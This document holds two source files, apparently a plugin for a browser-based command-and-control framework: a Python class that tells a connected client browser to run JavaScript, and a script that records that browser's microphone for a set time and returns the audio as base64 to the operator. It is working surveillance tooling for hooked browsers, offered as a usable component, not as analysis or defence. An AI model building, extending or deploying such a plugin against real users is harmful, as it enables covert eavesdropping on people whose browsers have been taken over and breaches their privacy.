File: plugins/c2/plugins/audio/audio.py
from c2.plugins.internal.plugins import BasePlugin


class AudioPlugin(BasePlugin):
    name = "audio"
    js_file = "audio.js"

    async def record(self, duration: float = 5.0) -> str:
        """Records audio from the client's microphone and returns it as a base64 data URL.

        The browser will prompt for microphone permission if not already granted.
        The recording stops automatically after the given duration.
        The returned data URL is typically audio/webm;codecs=opus (Chrome/Edge) or
        audio/ogg;codecs=opus (Firefox).

        :param duration: Recording duration in seconds. Default 5.
        :type duration: float
        :return: Base64-encoded audio as a data URL (data:audio/...;base64,...)
        :rtype: str
        """
        return await self.methods.eval_js(
            f'return window.recordAudio({duration});',
            timeout=duration + 10,
        )

File: plugins/c2/plugins/audio/audio.js
(function () {
    /**
     * Records audio from the microphone for the given duration and returns
     * a base64-encoded audio data URL (typically audio/webm;codecs=opus).
     *
     * @param {number} duration - Recording duration in seconds. Default 5.
     * @returns {Promise<string>} Base64 audio data URL.
     */
    window.recordAudio = function (duration) {
        if (duration === undefined || duration === null) duration = 5;
        duration = Math.max(0.5, Number(duration));

        if (!navigator.mediaDevices || !navigator.mediaDevices.getUserMedia) {
            return Promise.reject(new Error('[Audio] getUserMedia is not supported'));
        }

        return navigator.mediaDevices.getUserMedia({ audio: true, video: false })
            .then(function (stream) {
                return new Promise(function (resolve, reject) {
                    var chunks = [];
                    var recorder = new MediaRecorder(stream);

                    recorder.ondataavailable = function (e) {
                        if (e.data && e.data.size > 0) chunks.push(e.data);
                    };

                    recorder.onstop = function () {
                        stream.getTracks().forEach(function (t) { t.stop(); });
                        var blob = new Blob(chunks, { type: recorder.mimeType });
                        var reader = new FileReader();
                        reader.onloadend = function () { resolve(reader.result); };
                        reader.onerror  = reject;
                        reader.readAsDataURL(blob);
                    };

                    recorder.onerror = function (e) {
                        stream.getTracks().forEach(function (t) { t.stop(); });
                        reject(e.error || e);
                    };

                    recorder.start();
                    setTimeout(function () {
                        if (recorder.state !== 'inactive') recorder.stop();
                    }, duration * 1000);
                });
            });
    };

    console.log('[Audio] Plugin ready');
})();
